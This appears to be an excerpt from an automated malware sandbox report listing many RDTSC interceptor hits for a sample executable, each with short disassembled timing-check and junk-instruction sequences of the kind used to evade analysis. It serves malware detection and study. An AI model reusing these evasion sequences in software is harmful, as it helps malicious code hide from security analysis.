Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE1E6B second address: CE1E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE2572 second address: CE2578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE338E second address: CE339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FF724E96546h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE339C second address: CE33CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Ah 0x00000007 jmp 00007FF724EF309Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FF724EF3096h 0x00000019 jl 00007FF724EF3096h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE33CA second address: CE33E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Dh 0x00000007 jbe 00007FF724E96546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE36BF second address: CE36E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007FF724EF3096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF724EF30A9h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE36E7 second address: CE36ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE36ED second address: CE36F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE36F2 second address: CE36F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE36F8 second address: CE36FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE7CF6 second address: CE7D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96558h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE7D12 second address: CE7D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF724EF3096h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE7D22 second address: CE7D37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF724E9654Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE6FC7 second address: CE6FDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FF724EF3096h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d jo 00007FF724EF3096h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE7102 second address: CE7108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE7108 second address: CE710C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE710C second address: CE7128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96558h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE7128 second address: CE7142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF724EF30A0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE7142 second address: CE7148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE753A second address: CE753E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE753E second address: CE7542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE76AE second address: CE76CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF724EF30A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE76CC second address: CE76E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE7839 second address: CE7844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FF724EF3096h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE7995 second address: CE79C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Ch 0x00000007 jmp 00007FF724E96559h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE79C4 second address: CE79C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE79C9 second address: CE79D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007FF724E96546h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CEC8DA second address: CEC8E4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF724EF3096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CEC8E4 second address: CEC8E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF6360 second address: CF636C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF724EF3096h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF4470 second address: CF4474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF4474 second address: CF448A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF724EF30A0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF448A second address: CF44C4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF724E96553h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FF724E9654Bh 0x0000000f push esi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007FF724E96554h 0x00000021 popad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF44C4 second address: CF44CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF48DB second address: CF4906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF724E9654Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF724E96556h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF4906 second address: CF4924 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FF724EF309Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF4AB3 second address: CF4AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FF724E96555h 0x00000010 jbe 00007FF724E96552h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF4C35 second address: CF4C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF4C40 second address: CF4C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF4C44 second address: CF4C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF507A second address: CF508A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jp 00007FF724E96546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF5391 second address: CF5397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF5397 second address: CF53A9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF724E96546h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF53A9 second address: CF53C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF724EF30A0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF5A9F second address: CF5AAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF5AAA second address: CF5AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF724EF3096h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CF5AB7 second address: CF5AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF724E96558h 0x00000013 jmp 00007FF724E96556h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CFE76C second address: CFE773 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CFE371 second address: CFE376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CFE376 second address: CFE37C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CFE37C second address: CFE382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D0EDD1 second address: D0EDF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF724EF30A5h 0x00000009 jg 00007FF724EF3096h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D0EF3B second address: D0EF42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D11A99 second address: D11A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D11A9D second address: D11AAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D19B3D second address: D19B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D19B41 second address: D19B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FF724E96546h 0x0000000a jbe 00007FF724E96546h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D19B51 second address: D19B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF724EF30A5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D19B82 second address: D19B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D1E4D1 second address: D1E4EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF724EF3096h 0x0000000a jmp 00007FF724EF30A1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D28AAB second address: D28AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D28C23 second address: D28C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF724EF30A5h 0x0000000a jmp 00007FF724EF30A9h 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 jmp 00007FF724EF30A2h 0x00000017 pop edi 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D28F44 second address: D28F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF724E9654Fh 0x0000000a jnc 00007FF724E9655Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D28F7B second address: D28F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D28F7F second address: D28F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D28F83 second address: D28F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D28F8B second address: D28F9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF724E96546h 0x0000000a js 00007FF724E96546h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D28F9B second address: D28FAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FF724EF3096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D28FAA second address: D28FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D29287 second address: D2928D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D293F4 second address: D293FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D293FA second address: D2941C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF724EF3096h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FF724EF30A3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D2941C second address: D29426 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF724E96546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D29426 second address: D2946A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF724EF30A7h 0x0000000b popad 0x0000000c ja 00007FF724EF30CAh 0x00000012 push edx 0x00000013 jmp 00007FF724EF30A2h 0x00000018 jbe 00007FF724EF3096h 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D2946A second address: D2946E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D2CE3B second address: D2CE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D2CE41 second address: D2CE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D2CE45 second address: D2CE70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF724EF30A8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D2CE70 second address: D2CE75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D2CE75 second address: D2CE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FF724EF3096h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D30CEE second address: D30CF8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF724E9654Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D30B6A second address: D30B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FF724EF3096h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D415BA second address: D415C0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D415C0 second address: D415CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D415CA second address: D415CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D415CE second address: D415FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF724EF309Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FF724EF3096h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D415FB second address: D415FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D415FF second address: D41607 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D4E7BE second address: D4E7D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF724E9654Fh 0x00000009 jbe 00007FF724E96546h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D4E951 second address: D4E967 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D69367 second address: D6936D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D6936D second address: D69375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D68360 second address: D68364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D68364 second address: D68380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF724EF3096h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FF724EF3098h 0x00000012 jng 00007FF724EF309Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: D68A35 second address: D68A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
